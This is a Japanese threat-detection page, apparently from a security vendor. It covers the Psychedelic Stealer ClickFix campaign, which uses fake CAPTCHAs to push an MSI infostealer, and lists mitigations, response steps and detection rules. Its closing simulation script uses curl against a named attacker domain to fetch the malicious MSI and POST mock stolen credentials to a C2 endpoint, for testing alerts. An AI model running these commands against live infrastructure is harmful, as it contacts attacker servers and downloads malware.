サイケデリックスティーラー: CAPTCHAがインストーラーになるとき
Detection stack
- AIDR
- Alert
- ETL
- Query
概要
Arctic Wolf Labsは、ウクライナのビジネスウェブサイトに侵入し、偽のCloudflare CAPTCHAおとりを使用するキャンペーンを追跡しています。このClickFixスタイルの攻撃は、ユーザーにMSIパッケージを実行させ、ブラウザの資格情報、アカウントトークン、暗号通貨ウォレットデータを収集するために設計された情報スティーラー「Psychedelic Stealer」をインストールさせます。このマルウェアは、専用のC2インフラストラクチャを通じて持続的なリモートタスキングもサポートしています。
調査
調査により、正当なウクライナのウェブサイトに注入されたiframeが明らかになり、訪問者を偽の検証フローにリダイレクトしていました。アナリストはまた、コマンド設定を管理し、訪問者のテレメトリーを記録するRublevka TDSというブランドの誘導管理パネルも特定しました。MSIペイロードの技術分析では、暗号化された次のステージのURLと、認証情報やデータ盗難のためのマルウェアのコアのルーチンが明らかになりました。
軽減策
組織は、ウェブブラウザまたはコマンドラインインターフェースによって起動されるWindowsインストーラー (msiexec.exe) の不審な実行を監視する必要があります。ウェブフィルタリングは既知の悪意あるドメインをブロックすると同時に、正当なウェブ資産についても不正なiframe注入がないか監視するべきです。スケジュールされたタスクの作成に関するエンドポイントコントロールを強化することにより、持続性のリスクをさらに低減できます。
対応
Psychedelic Stealerの活動が検出された場合は、さらなるデータ流出や横方向の移動を防ぐために影響を受けたエンドポイントを隔離しましょう。ブラウザのプロファイルやローカルストレージで、侵害された資格情報、認証トークン、ウォレットデータを監査します。既知のC2インフラストラクチャとの通信のためのネットワークテレメトリーを確認し、システムに不正なスケジュールタスクや疑わしいネイティブメッセージホストがないか検査します。
攻撃フロー
検出
LOLBinセマンティクスのある疑わしいRunMRUエントリ (via registry_event)
リモートMSIファイルインストール試行の可能性 (via cmdline)
一般的でないポートによる直接IPとのHTTP経由の可能なC2通信 (via proxy)
直接IPによる疑わしいファイルダウンロード (via proxy)
検出するためのIOC (HashSha256): Psychedelic Stealer: CAPTCHAがインストーラーになるとき
検出するためのIOC (SourceIP): Psychedelic Stealer: CAPTCHAがインストーラーになるとき
検出するためのIOC (DestinationIP): Psychedelic Stealer: CAPTCHAがインストーラーになるとき
Psychedelic Stealerインフラストラクチャアクセスの検出 [ウェブサーバー]
シミュレーション実行
-
攻撃のナラティブとコマンド: 攻撃者は、偽のCAPTCHAメカニズムを使用してターゲットを感染させることを目的としています。このシミュレーションは、被害者のブラウザの動作を模倣します:最初に攻撃者のランディングページにナビゲートして初期監視を回避し、その後、悪意あるMSIペイロードを要求し、最後に攻撃者のコントロールスクリプトへのHTTP POSTを介したC2接続を開始します。このシーケンスは、Psychedelic Stealerインフラストラクチャで特定されたURIパターンを正確に模倣するように設計されています。
-
回帰テストスクリプト: 以下のスクリプトは
curlを使用して、検出ロジックの3つの異なるステージをシミュレートします。#!/bin/bash # Psychedelic Stealerインフラストラクチャアクセスのためのシミュレーションスクリプト TARGET_DOMAIN="uasputnik.com" echo "[+] Psychedelic Stealerインフラストラクチャシミュレーションを開始します..." # ステージ1: ランディングページの訪問をシミュレート(選択肢1) echo "[*] ランディングページへのGETリクエストをシミュレートしています..." curl -s -X GET "http://$TARGET_DOMAIN/sputnik.html" -o /dev/null # ステージ2: 悪意あるMSIのダウンロードをシミュレート(選択肢2) echo "[*] ペイロードのGETリクエストをシミュレートしています..." curl -s -X GET "http://$TARGET_DOMAIN/elita.msi" -o /dev/null # ステージ3: HTTP POSTを介したC2通信をシミュレート(選択肢3) echo "[*] C2エンドポイントへのPOSTリクエストをシミュレートしています..." curl -s -X POST "http://$TARGET_DOMAIN/admin777111777.php" -d "data=stolen_credentials" -o /dev/null echo "[+] シミュレーション完了。SIEMでアラートを確認してください。" -
クリーンアップコマンド:
# これはネットワークベースのシミュレーションであるため、特に要求されない限りローカルシステムにファイルは生成されません。 # ローカルファイルシステムのクリーンアップは不要です。 echo "[+] クリーンアップ完了。"